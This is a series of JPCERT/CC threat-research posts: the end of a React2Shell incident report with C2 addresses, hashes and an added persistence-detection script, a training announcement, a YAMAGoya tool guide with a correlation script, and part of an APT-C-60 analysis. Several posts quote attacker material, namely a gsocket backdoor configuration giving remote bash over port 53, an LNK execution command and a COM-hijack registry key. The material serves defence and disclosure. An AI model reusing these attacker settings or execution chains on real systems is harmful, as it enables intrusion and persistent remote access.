Relay Network). Hosts holding the same pre-shared secret can communicate with each other; the traffic is end-to-end encrypted, and GSRN relays only the encrypted traffic. <br /> In this case the attacker ran it with the environment variables and options shown below, using npm-cli.dat as the secret file and abusing it as a backdoor that could be operated from outside via bash over port 53, the port normally used for DNS.</p> <pre> GS_PORT='53' SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/***/.config/dbus/npm-cli.dat -liqD" </pre> <h3>Closing</h3> <p>The React2Shell vulnerability was rapidly incorporated into attack tooling after disclosure, and within just a few days it was being exploited by many actors. Attackers weaponize vulnerabilities very quickly, so when a critical vulnerability is published it is important to promptly assess the scope of impact and apply patches or other remediation. <br /> When responding to a vulnerability known to be exploited, you also need to check for signs of compromise alongside patching. As in this case, a server may have suffered more serious compromise than a visible defacement, so we recommend carefully investigating whether anything else has been affected. <br /> The C2 destinations and other details of the malware described here are listed in the Appendix.</p> <p style="text-align: right;">Kota Kino, Yuki Yano, Incident Response Group</p> <h3>References</h3> <p><a name="1"></a>[1] UNC5174's Windows version of the SNOWLIGHT malware <br /> <a href="https://sect.iij.ad.jp/blog/2025/11/unc5174-windows-snowlight-in-2025/" target="_blank" rel="noopener">https://sect.iij.ad.jp/blog/2025/11/unc5174-windows-snowlight-in-2025/</a></p> <p><a name="2"></a>[2] Multiple Threat Actors Exploit React2Shell (CVE-2025-55182) <br /> <a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182" target="_blank" rel="noopener">https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182</a></p> <p><a name="3"></a>[3] Attacks using CrossC2, a tool that extends Cobalt Strike Beacon functionality to other platforms <br /> <a href="https://blogs.jpcert.or.jp/ja/2025/08/crossc2.html" target="_blank" rel="noopener">https://blogs.jpcert.or.jp/ja/2025/08/crossc2.html</a></p> <p><a name="4"></a>[4] Global Socket <br /> <a href="https://github.com/hackerschoice/gsocket" target="_blank" rel="noopener">https://github.com/hackerschoice/gsocket</a></p> <h4>Appendix A: C2 destinations</h4> <table border="1" width="100%"> <thead> <tr> <th><div style="text-align: center;">No.</div></th> <th><div style="text-align: center;">Destination</div></th> <th><div style="text-align: center;">Purpose</div></th> </tr> </thead> <tbody> <tr> <td>1</td> <td>45.143.131[.]123:59999</td> <td>SNOWLIGHT download source / C2 server</td> </tr> <tr> <td>2</td> <td>154.89.152[.]240:443</td> <td>CrossC2 C2 server</td> </tr> </tbody> </table> <h4>Appendix B: Malware hashes</h4> <table border="1" width="100%"> <thead> <tr> <th><div style="text-align: center;">No.</div></th> <th><div style="text-align: center;">Hash (SHA-256)</div></th> <th><div style="text-align: center;">File name</div></th> </tr> </thead> <tbody> <tr> <td>1</td> <td>5bae25736a09de5f4a0f9761d2b7bfa81ca8dba39de2a724473c9d021a65daa9</td> <td>sex.sh</td> </tr> <tr> <td>2</td> <td>ba43e447e63611d365300bf2e8e43ccb02ea112778d0d555ef9a9ccf6169808b</td> <td>sex.sh</td> </tr> <tr> <td>3</td> <td>ac3e12fa0aa4d6e4eed322e81ecf708a8c9bea29247ae6b26cc39d3b3a6c2fb8</td> <td>miner.sh</td> </tr> <tr> <td>4</td> <td>a536d755313ce550a510137211eca6171f636fb316026e9df8523c496c8fcd12</td> <td>xmrig</td> </tr> <tr> <td>5</td> <td>0c748b9e8bc6b5b4fe989df67655f3301d28ef81617b9cbe8e0f6a19d4f9b657</td> <td>xmrig</td> </tr> <tr> <td>6</td> <td>1a1edbea47162b1aa844252fcd4fb97f2a67faec1993e7819efc6a04b7c15552</td> <td>javax</td> </tr> <tr> <td>7</td> <td>0d07a974993221305ca7af139b73d9de1dcd992f553215e4f041e830a2d82729</td> <td>javas</td> </tr> <tr> <td>8</td> <td>5baa52387daedea5e3e00adf96ecacb4a2cdc98100664f29ac86e8e4a423baaf</td> <td>54ad0ee3tcp</td> </tr> <tr> <td>9</td> <td>c1a9cfc62626118bd9f54e401fd52ecd2d766a5e8a69dbc7db909ea5c987fcc0</td> <td>54ad0ee3tcp</td> </tr> <tr> <td>10</td> <td>4a74676bd00250d9b905b95c75c067369e3911cdf3141f947de517f58fc9f85c</td> <td>rsyslo</td> </tr> <tr> <td>11</td> <td>cb5f62bf7b591e69bd38e6bf8e40e8d307d154b2935703422d44f02e403d2e78</td> <td>npm-cli</td> </tr> </tbody> </table>
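The persistence described in the React2Shell case above (gsocket disguised as npm-cli and launched hourly from cron with GS_PORT=53 and a -k secret file, plus /tmp/kernal run every minute) is a pattern that can be triaged from a crontab and a process listing. The script below is an added example for this post, not code from JPCERT/CC or from the gsocket project; the crontab text and the process entries are constructed samples modeled on the indicators reported above, the /home/app paths are invented, and the helper names (check_cron, check_process, hunt) are this example's own.

```python
"""Triage helper for the cron + gsocket persistence pattern described in the post.

Added example, not JPCERT/CC's or gsocket's own code. The crontab text and the
process entries are constructed samples modeled on the post's indicators
(reported file names, GS_* variables, port 53, /tmp/kernal every minute);
the /home/app paths are invented.
"""
import os
import shlex
from dataclasses import dataclass, field

# File names reported in the post (Table 2), including the cron-launched "kernal".
SUSPICIOUS_BASENAMES = {"sex.sh", "sex.sh.1", "miner.sh", "xmrig",
                        "javax", "javas", "rsyslo", "npm-cli", "kernal"}
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Single-letter gsocket flags bundled in the post's GS_ARGS value "-liqD".
GS_DAEMON_LETTERS = set("liqD")


@dataclass
class Finding:
    source: str
    line: str
    reasons: list = field(default_factory=list)


def parse_cron_line(line):
    """Return (schedule, command) for a crontab entry; None for blank, comment
    and VAR=value lines. @reboot-style entries are ignored in this example."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, 5)
    if len(parts) < 6 or "=" in parts[0]:
        return None
    return " ".join(parts[:5]), parts[5]


def gsocket_env_reasons(env):
    """Reasons derived from an environment mapping (VAR -> value)."""
    reasons = []
    gs_keys = sorted(k for k in env if k.startswith("GS_"))
    if gs_keys:
        reasons.append("gsocket environment present: " + ", ".join(gs_keys))
    if env.get("GS_PORT") == "53":
        reasons.append("GS_PORT=53: relay traffic blended into the DNS port")
    args = env.get("GS_ARGS", "").split()
    has_secret_file = "-k" in args
    has_daemon_flags = any(t.startswith("-") and not t.startswith("--")
                           and GS_DAEMON_LETTERS & set(t[1:]) for t in args)
    if has_secret_file and has_daemon_flags:
        reasons.append("GS_ARGS uses a secret file (-k) with listen/daemon flags")
    return reasons


def check_cron(text, source="crontab"):
    """Flag crontab entries that match the post's persistence pattern."""
    findings = []
    for raw in text.splitlines():
        parsed = parse_cron_line(raw)
        if parsed is None:
            continue
        schedule, command = parsed
        try:
            argv = shlex.split(command)
        except ValueError:
            argv = command.split()
        env, prog = {}, ""
        for tok in argv:  # leading VAR=value tokens are the command's environment
            if "=" in tok and not tok.startswith("-"):
                key, value = tok.split("=", 1)
                env[key] = value
            else:
                prog = tok
                break
        reasons = gsocket_env_reasons(env)
        base = os.path.basename(prog)
        if base in SUSPICIOUS_BASENAMES:
            reasons.append(f"binary name '{base}' matches a file reported in the incident")
        if prog.startswith(WORLD_WRITABLE):
            reasons.append(f"runs from a world-writable directory: {prog}")
        if schedule == "* * * * *":
            reasons.append("scheduled every minute (re-launch loop for a short-lived implant)")
        if reasons:
            findings.append(Finding(source, raw.strip(), reasons))
    return findings


def check_process(proc):
    """Flag one running process given its cmdline string and environ dict."""
    reasons = gsocket_env_reasons(proc["environ"])
    argv = proc["cmdline"].split()
    base = os.path.basename(argv[0]) if argv else ""
    if base in SUSPICIOUS_BASENAMES:
        reasons.append(f"binary name '{base}' matches a file reported in the incident")
    return Finding(f"pid {proc['pid']}", proc["cmdline"], reasons) if reasons else None


SAMPLE_CRONTAB = """\
SHELL=/bin/bash
# constructed sample, not a real crontab
0 3 * * * /usr/bin/certbot renew --quiet
0 * * * * GS_PORT='53' SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/app/.config/dbus/npm-cli.dat -liqD" /home/app/.config/dbus/npm-cli
* * * * * /tmp/kernal
"""

SAMPLE_PROCESSES = [  # constructed: what /proc/<pid>/cmdline and environ might show
    {"pid": 1200, "cmdline": "/usr/sbin/sshd -D", "environ": {"PATH": "/usr/sbin:/usr/bin"}},
    {"pid": 2311, "cmdline": "/home/app/.config/dbus/npm-cli",
     "environ": {"GS_PORT": "53", "SHELL": "/bin/bash", "TERM": "xterm-256color",
                 "GS_ARGS": "-k /home/app/.config/dbus/npm-cli.dat -liqD"}},
]


def hunt(crontab_text=SAMPLE_CRONTAB, processes=SAMPLE_PROCESSES):
    """Run both checks and return every finding."""
    findings = check_cron(crontab_text)
    findings += [f for f in map(check_process, processes) if f]
    return findings


if __name__ == "__main__":
    for f in hunt():
        print(f"[{f.source}] {f.line}")
        for r in f.reasons:
            print("   -", r)
```

On a real host the same functions would be fed the output of `crontab -l` for each user (and the files under /etc/cron.d) and the contents of /proc/&lt;pid&gt;/environ, which requires root to read for other users' processes; the binary-name check is deliberately a weak signal on its own and only becomes meaningful alongside the GS_* environment, the DNS port and the every-minute schedule.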
  46. Release of Training Content for Windows Event Log Analysis

    Tue, 10 Feb 2026 02:00:00 -0000

    Introduction JPCERT/CC has released training content on investigation techniques for security incidents (hereinafter...
    <h3>Introduction</h3> <p>JPCERT/CC has released training content (hereinafter "this content") on investigation techniques for security incidents (hereinafter "incidents") caused by targeted attacks. In real incidents, the pattern of an attacker exploiting a vulnerability or misconfiguration in an Internet-facing device to enter the internal network and ultimately compromise Active Directory administrator privileges is increasingly common. For this reason, this content was created as training focused on Active Directory.</p> <p>Log Analysis Training Version 2<br><a href="https://github.com/JPCERTCC/log-analysis-training_v2/">https://github.com/JPCERTCC/log-analysis-training_v2/</a></p> <p>This content was produced with the cooperation of Mitsui Bussan Secure Directions, Inc.</p> <h3>Overview of the Training Content</h3> <p>Incident response typically follows the flow detection → initial investigation → interim containment → full investigation → reporting → permanent countermeasures, and this content specializes in the initial investigation. It consists of a Basics part and a Practical part; the Basics part covers the following topics.</p> <ul> <li>Typical corporate network layout</li> <li>Directory Service</li> <li>Active Directory</li> <li>Domain controllers</li> <li>Domains and forests</li> <li>Authentication/authorization in AD</li> <li>Kerberos authentication</li> <li>NTLM authentication</li> <li>Remote and local authentication</li> <li>Group Policy Objects</li> <li>Attacker network intrusion techniques</li> <li>Pass-the-Hash</li> <li>Pass-the-Ticket</li> <li>NTDS dumping</li> <li>Kerberoast (Kerberoasting attacks)</li> <li>NTLM relay attacks</li> <li>How to read Event Viewer</li> </ul> <h3>Details of the Training Content</h3> <p>The content covers everything from a basic explanation of domain controllers to authentication and authorization in Active Directory, so learners can acquire the foundational knowledge needed for incident investigation and analysis.</p> <p><img class="asset asset-image at-xid-4014994 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-092857-320wri.png" alt="" width="320" height="180"></p> <p><img class="asset asset-image at-xid-4014961 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-092927-320wri.png" alt="" width="320" height="180"><br>In addition, learners can study the network intrusion techniques attackers use in targeted attacks and the Windows event log investigation techniques needed to address them.</p> <p class="MsoNormal"><img class="asset asset-image at-xid-4015076 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093223-320wri.png" alt="" width="320" height="180"></p> <p class="MsoNormal"><img class="asset asset-image at-xid-4015078 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093252-320wri.png" alt="" width="320" height="180"></p> <p>The Practical part builds on the Basics part: it can be used as scenario-based training in which learners analyze Windows event logs in Event Viewer and construct the attack timeline.</p> <p class="MsoNormal"><img class="asset asset-image at-xid-4015079 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093642-320wri.png" alt="" width="320" height="180"></p> <h3>Closing</h3> <p>This content analyzes Windows event logs using Event Viewer. In real incidents the logs are often enormous, and investigating the relationships between log entries is difficult with Event Viewer alone, so routinely training in analysis methods other than Event Viewer will make real investigations go more smoothly.<br>JPCERT/CC has also released LogonTracer, a tool that supports the analysis of Windows event logs during such real incidents.</p> <p><strong>LogonTracer</strong><br><a href="https://github.com/JPCERTCC/LogonTracer">https://github.com/JPCERTCC/LogonTracer</a></p> <p>We recommend establishing Windows event log investigation procedures using such tools in normal times and running incident investigation exercises, so that you are prepared when a real incident occurs.</p>
  47. YAMAGoya: A Real-Time Client Monitoring Tool Using Sigma and YARA Rules

    Tue, 18 Nov 2025 02:00:00 -0000

    In recent years, fileless malware and malware obfuscation have made it hard to detect suspicious activity by scanning individual files ...
    <p>In recent years, fileless malware and malware obfuscation have made it difficult to detect suspicious activity by scanning individual files alone. To counter such threats, security researchers and malware analysts actively write and publish rules such as Sigma and YARA. However, because existing endpoint security tools use their own detection engines, there is a shortage of products that can use Sigma and YARA directly. To address this, we have released <strong>YAMAGoya</strong>, an open-source threat hunting tool. YAMAGoya is available in the following GitHub repository; feel free to use it.</p> <p>GitHub JPCERTCC/YAMAGoya:<a href="https://github.com/JPCERTCC/YAMAGoya" title="YAMAGoya" target="_blank">https://github.com/JPCERTCC/YAMAGoya</a></p> <p><figure class="mt-figure mt-figure-center"><a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig1-640wri.png" width="640" height="424" alt="YAMAGoya startup screen" class="asset asset-image at-xid-3934285 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>Figure 1: YAMAGoya startup screen</figcaption></figure></p> <p>The following sections introduce YAMAGoya's concept and how to use it.</p> <h3>YAMAGoya's concept</h3> <p>YAMAGoya is designed to detect threats by combining <strong>ETW (Event Tracing for Windows) event monitoring</strong> with <strong>memory scanning</strong>. Its main features are as follows.</p> <ul> <li><strong>Runs entirely in user land</strong>: no kernel driver is required, so it is easy to deploy</li> <li><strong>Real-time monitoring</strong>: files, processes, the registry, DNS, network, PowerShell, WMI and more can be monitored in real time via ETW</li> <li><strong>Multiple rule formats</strong>: supports Sigma rules and an original YAML rule format that can be used for correlation analysis</li> <li><strong>Memory scanning</strong>: detects fileless and packed malware with YARA rules</li> <li><strong>GUI/CLI support</strong>: usable from the GUI, and also automatable from the command line</li> </ul> <h3>Installation</h3> <h4>Obtaining the binary</h4> <p>If you want to evaluate it right away, binaries are available from the <a href="https://github.com/JPCERTCC/YAMAGoya/releases" title="GitHubレポジトリのReleases" target="_blank">Releases page of the GitHub repository</a>.</p> <h4>Building</h4> <p>To build from source, see the <a href="https://github.com/JPCERTCC/YAMAGoya/blob/main/README_jp.md" title="YAMAGoya_README" target="_blank">README</a>.</p> <h3>Usage</h3> <p>YAMAGoya can be used from either the GUI or the CLI. Running it from the command line with no options, or double-clicking it, starts the GUI.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'># Run the GUI
> YAMAGoya.exe</pre> <p>This tool must be run with administrator privileges (in order to start the ETW session). When running it, either right-click and choose "Run as administrator", or run it from a command prompt opened as administrator.</p> <p>From the command line, it can be used as follows. For the other options, check the <strong>help</strong> option.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'># Monitor with Sigma rules
> YAMAGoya.exe --session --sigma "C:\Rules\Sigma" --all</pre> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'># Memory scan with YARA rules
> YAMAGoya.exe --session --yara "C:\Rules\YARA" --all</pre> <h3>Rules supported by YAMAGoya</h3> <p>YAMAGoya supports Sigma rules and YARA rules, so take advantage of publicly available rules. For Sigma rules, the supported categories are limited to those that target the Windows OS. For details, see the <a href="https://github.com/JPCERTCC/YAMAGoya/blob/main/README_jp.md#sigma%25E3%2581%258B%25E3%2582%2589etw%25E3%2581%25B8%25E3%2581%25AE%25E3%2583%259E%25E3%2583%2583%25E3%2583%2594%25E3%2583%25B3%25E3%2582%25B0" title="YAMAGoya_README" target="_blank">README</a>.</p> <p>In addition to Sigma and YARA rules, the tool supports an original YAML rule format. The following explains how to write original YAML rules.</p> <h4>How to write original YAML rules</h4> <p>To create an original YAML rule, follow the schema below. Each rule file must contain the following:</p> <pre style='padding: 10px 10px;color:#1a1a1a;background:#f5f0f0;overflow: auto;white-space: pre'>- rulename: a unique name for the rule
- description: a description of what the rule detects
- rules: a list of rule items. Each item must contain the following:
    - ruletype: the type of rule (e.g. regex, binary)
    - target: the event category to match
    - rule: the pattern or value to match (a valid regular expression for regex rules)</pre> <p>The categories listed in Table 1 can be used as the <strong>target</strong>.</p> <table> <thead> <caption>Table 1: List of targets</caption> <tr> <td style="background-color: #bdbdbd; width: 100px; text-align: center;">target name</td> <td style="background-color: #bdbdbd; width: 400px; text-align: center;">Description</td> </tr> </thead> <tbody> <tr> <td>file</td> <td>File creation event</td> </tr> <tr> <td>delfile</td> <td>File deletion event</td> </tr> <tr> <td>process</td> <td>Process event</td> </tr> <tr> <td>open</td> <td>OpenProcess</td> </tr> <tr> <td>load</td> <td>DLL load event</td> </tr> <tr> <td>registry</td> <td>Registry event</td> </tr> <tr> <td>dns</td> <td>DNS event</td> </tr> <tr> <td>ipv4</td> <td>IPv4 network event</td> </tr> <tr> <td>ipv6</td> <td>IPv6 network event</td> </tr> <tr> <td>shell</td> <td>Shell-related events (Run key, shortcuts)</td> </tr> <tr> <td>powershell</td> <td>PowerShell execution event</td> </tr> <tr> <td>wmi</td> <td>WMI command execution event</td> </tr> </tbody> </table> <p>By default, an alert is raised when all of the rules written in one file are observed within 10 seconds. For example, you can write a rule that detects malware when it creates the following files, runs the following process, loads the following DLL and communicates with the following address. Original YAML rules are useful when you want to detect by correlating several activities like this.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>rulename: "ANEL"
description: "Detects ANEL from maldoc type"
rules:
  - ruletype: "regex"
    target: "file"
    rule: "Tmp\\.docx$"
  - ruletype: "regex"
    target: "process"
    rule: "ScnCfg32\\.Exe$"
  - ruletype: "regex"
    target: "dll"
    rule: "vsodscpl\\.dll$"
  - ruletype: "regex"
    target: "file"
    rule: "TCDolW0p\\.log$"
  - ruletype: "ipv4"
    target: "ipv4"
    rule: "45.32.116.146"</pre> <h3>Checking the logs</h3> <p>When using the GUI, you can check the logs in the Alerts tab. You can also view the text log via <strong>Open Log File</strong> in the Alerts tab shown in Figure 2.</p> <p><figure class="mt-figure mt-figure-center"><a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig2.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig2-640wri.png" width="640" height="423" alt="YAMAGoya Alerts tab" class="asset asset-image at-xid-3934286 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>Figure 2: YAMAGoya Alerts tab</figcaption></figure></p> <p>Alerts are also saved to the event log (Application). Table 2 lists the event IDs that YAMAGoya records.</p> <table> <thead> <caption>Table 2: Event log IDs recorded by YAMAGoya (Application)</caption> <tr> <td style="background-color:#bdbdbd; width:100px; text-align:center;">Event ID</td> <td style="background-color:#bdbdbd; text-align:center;">Main trigger condition</td> </tr> </thead> <tbody> <tr> <td style="text-align:center;">8001</td> <td>Detection by an original YAML rule</td> </tr> <tr> <td style="text-align:center;">8002</td> <td>Some elements of an original YAML rule matched (debug message)</td> </tr> <tr> <td style="text-align:center;">8003</td> <td>Termination of a process detected by an original YAML rule (when running in Kill mode)</td> </tr> <tr> <td style="text-align:center;">8005</td> <td>WinRM outbound communication</td> </tr> <tr> <td style="text-align:center;">8006</td> <td>WinRM inbound communication</td> </tr> <tr> <td style="text-align:center;">8008</td> <td>Security Mitigations event</td> </tr> <tr> <td style="text-align:center;">8009</td> <td>Security Adminless event detected</td> </tr> <tr> <td style="text-align:center;">8011</td> <td>Security CVE event detected</td> </tr> <tr> <td style="text-align:center;">8012</td> <td>SMB server authentication detected</td> </tr> <tr> <td style="text-align:center;">8013</td> <td>SMB server file share detected</td> </tr> <tr> <td style="text-align:center;">8014</td> <td>SMB server file share addition detected</td> </tr> <tr> <td style="text-align:center;">8015</td> <td>SMB client connection failure</td> </tr> <tr> <td style="text-align:center;">8016</td> <td>SMB client file transfer</td> </tr> <tr> <td style="text-align:center;">8017</td> <td>ETW session started</td> </tr> <tr> <td style="text-align:center;">8018</td> <td>ETW session stopped</td> </tr> <tr> <td style="text-align:center;">9001</td> <td>Detection by a Sigma rule</td> </tr> <tr> <td style="text-align:center;">9002</td> <td>Termination of a process detected by a Sigma rule (when running in Kill mode)</td> </tr> </tbody> </table> <p><figure class="mt-figure mt-figure-center"><a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig3.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig3-640wri.png" width="640" height="302" alt="YAMAGoya alert recorded in the event log" class="asset asset-image at-xid-3934287 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>Figure 3: YAMAGoya alert recorded in the event log</figcaption></figure></p> <h3>Conclusion</h3> <p>Because YAMAGoya can use publicly available signatures such as Sigma and YARA, it lets you apply the security community's know-how to your own defenses. Please use it for threat hunting, incident response and similar work. Pull requests and feature requests for the tool are welcome.</p> <h4>FAQ</h4> <h5>Q1. Can YAMAGoya replace conventional antivirus software?</h5> <p>A. No. YAMAGoya complements antivirus software rather than replacing it. It ships with no detection rules by default, so you need to start by collecting or writing detection rules.</p> <h5>Q2. Can it run resident (in the background)?</h5> <p>A. Yes. It can sit in the system tray and monitor in the background. Based on the configured rules, it raises a notification and writes a log entry whenever something is detected.</p> <h5>Q3. Can it integrate with an existing SIEM?</h5> <p>A. Yes. YAMAGoya writes its logs to text files and to the event log (Application). Forward these with a log collection agent or forwarding feature and they can be ingested into a SIEM such as Splunk.</p> <h5>Q4. Are there limitations in countering ETW bypass (evasion) techniques?</h5> <p>A. Yes. At present no dedicated countermeasures against ETW bypass are implemented. A sophisticated attacker could disable or tamper with ETW to evade detection. We recommend building defense in depth by using it alongside EDR and other monitoring tools.</p>
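The correlation behaviour of the original YAML rule format (all items of one rule file observed within the default 10-second window) is easier to reason about with a runnable model. The following is an added example written for this page; it is not YAMAGoya's own code or part of the original post. It parses the ANEL rule shown above with a purpose-built mini-parser (an assumption of this example: flat keys plus a `rules` list of double-quoted `ruletype`/`target`/`rule` items, not a general YAML parser), evaluates it over a constructed stream of `(timestamp, target, value)` events, and raises an alert only when every item has matched within the window. Treating non-`regex` rule types as exact string matches is also an assumption made here, not YAMAGoya's documented behaviour.

```python
import re

WINDOW_SECONDS = 10  # default correlation window described in the post

# The ANEL rule from the post, in its original YAML schema.
# Note: the post's example uses target "dll" although Table 1 lists "load";
# this correlator simply matches whatever target name the rule uses.
RULE_YAML = r'''
rulename: "ANEL"
description: "Detects ANEL from maldoc type"
rules:
  - ruletype: "regex"
    target: "file"
    rule: "Tmp\\.docx$"
  - ruletype: "regex"
    target: "process"
    rule: "ScnCfg32\\.Exe$"
  - ruletype: "regex"
    target: "dll"
    rule: "vsodscpl\\.dll$"
  - ruletype: "regex"
    target: "file"
    rule: "TCDolW0p\\.log$"
  - ruletype: "ipv4"
    target: "ipv4"
    rule: "45.32.116.146"
'''


def parse_rule(text):
    """Minimal parser for this schema only (assumption: flat keys plus a 'rules'
    list of ruletype/target/rule items, all values double-quoted)."""
    rule = {"rules": []}
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "rules:":
            in_rules = True
            continue
        if line.startswith("- "):          # start of a new rule item
            rule["rules"].append({})
            line = line[2:].strip()
        key, _, value = line.partition(":")
        # strip quotes and resolve the YAML double-quoted "\\" escape to a single backslash
        value = value.strip().strip('"').replace("\\\\", "\\")
        if in_rules:
            rule["rules"][-1][key.strip()] = value
        else:
            rule[key.strip()] = value
    return rule


def item_matches(item, value):
    """regex items use re.search; any other ruletype (e.g. ipv4) is treated as an
    exact string match (assumption for this example)."""
    if item["ruletype"] == "regex":
        return re.search(item["rule"], value) is not None
    return item["rule"] == value


def correlate(rule, events, window=WINDOW_SECONDS):
    """Alert when every item of the rule has matched and the matching events all
    fall within `window` seconds of each other. events: (timestamp, target, value)."""
    items = rule["rules"]
    last_seen = [None] * len(items)
    alerts = []
    for ts, target, value in sorted(events, key=lambda e: e[0]):
        for idx, item in enumerate(items):
            if item["target"] == target and item_matches(item, value):
                last_seen[idx] = ts
        if all(t is not None for t in last_seen) and max(last_seen) - min(last_seen) <= window:
            alerts.append((rule["rulename"], min(last_seen), max(last_seen)))
            last_seen = [None] * len(items)  # fire once per complete sequence
    return alerts


# Constructed event stream (not real telemetry): benign noise, one full chain
# within 10 s, then a second chain spread over 18 s that must NOT alert.
SAMPLE_EVENTS = [
    (5,   "file",    r"C:\Users\alice\Documents\report.docx"),
    (100, "file",    r"C:\Users\alice\AppData\Local\Temp\Tmp.docx"),
    (101, "process", r"C:\Users\alice\AppData\Local\Temp\ScnCfg32.Exe"),
    (102, "dll",     r"C:\Users\alice\AppData\Local\Temp\vsodscpl.dll"),
    (103, "file",    r"C:\Users\alice\AppData\Local\Temp\TCDolW0p.log"),
    (105, "ipv4",    "45.32.116.146"),
    (300, "file",    r"C:\Users\bob\AppData\Local\Temp\Tmp.docx"),
    (315, "process", r"C:\Users\bob\AppData\Local\Temp\ScnCfg32.Exe"),
    (316, "dll",     r"C:\Users\bob\AppData\Local\Temp\vsodscpl.dll"),
    (317, "file",    r"C:\Users\bob\AppData\Local\Temp\TCDolW0p.log"),
    (318, "ipv4",    "45.32.116.146"),
]


def run_sample():
    return correlate(parse_rule(RULE_YAML), SAMPLE_EVENTS)


if __name__ == "__main__":
    for name, start, end in run_sample():
        print(f"ALERT {name}: all rule items matched between t={start}s and t={end}s")
```

Only the first chain alerts; the second one has all five activities but spread over 18 seconds, so it stays below the correlation threshold. That is the trade-off of a fixed window: a slow-staged infection evades it, which is why the post's Sigma and YARA support matter as the per-event and in-memory complements to correlation rules.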
  48. Update on Attacks by the Attack Group APT-C-60

    Mon, 27 Oct 2025 01:30:00 -0000

    In a previous JPCERT/CC Eyes post, we introduced attacks by the attack group APT-... 
    <p>In a previous JPCERT/CC Eyes post we introduced <a href="https://blogs.jpcert.or.jp/ja/2024/11/APT-C-60.html" target="_blank">attacks by the attack group APT-C-60 abusing legitimate services</a>, and JPCERT/CC has continued to observe similar attack activity in Japan. This post covers the attacks observed between June and August 2025, focusing on what has changed since the previous post, under the following headings.</p> <ul> <li>Attack flow</li> <li>Updates to the downloaders and SpyGlace</li> <li>SpyGlace's encoding function and communication method</li> <li>Decoy documents used</li> <li>Analysis of the GitHub repositories</li> </ul> <h3>Attack flow</h3> <p>The attacks JPCERT/CC observed were, like those around August 2024, targeted emails sent to an organization's recruiting staff by a sender posing as a job applicant. Figure 1 shows the attack flow. Last year's attacks had the victim download a VHDX file from Google Drive, whereas in these attacks the malicious VHDX file was attached directly to the email. When the recipient clicks the LNK file inside the VHDX file, a malicious script is executed through Git, a legitimate program.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update01-800wri.png" width="800" height="449" alt="" class="asset asset-image at-xid-3922463 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 1: Malware infection flow </div> <p><br></p> <p>The LNK file runs gcmd.exe (a legitimate Git binary) as shown below, which executes the script glog.txt stored inside the VHDX file.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>P:\LICENSES.LOG\mingw64\bin\gcmd.exe "cd .\LICENSES.LOG\mingw64\bin && type glog.txt | gcmd.exe" && exit</pre> <p>The script run by Git displays the decoy document and creates and executes files; the created WebClassUser.dat (hereafter Downloader1) is registered under the following registry key and is persisted and executed via COM hijacking.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>HKCU\Software\Classes\CLSID\{566296fe-e0e8-475f-ba9c-a31ad31620b1}\InProcServer32</pre> <h3>Updates to Downloader1 and Downloader2</h3> <p>To let the attacker keep track of infected hosts, Downloader1 communicates at regular intervals with statcounter, a legitimate statistics service. The request header is built in the following format. Compared with the previous version, the difference is that the <strong>volume serial number</strong> and <strong>computer name</strong> are used to identify the infected host.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>Referer: ONLINE=>[Number1],[Number2] >> [%userprofile%] / [VolumeSerialNumber + ComputerName]</pre> <p>Downloader1 also combines a file name made from the <strong>volume serial number</strong> and <strong>computer name</strong> with a URL embedded in the sample to build a path in the following format, which it then 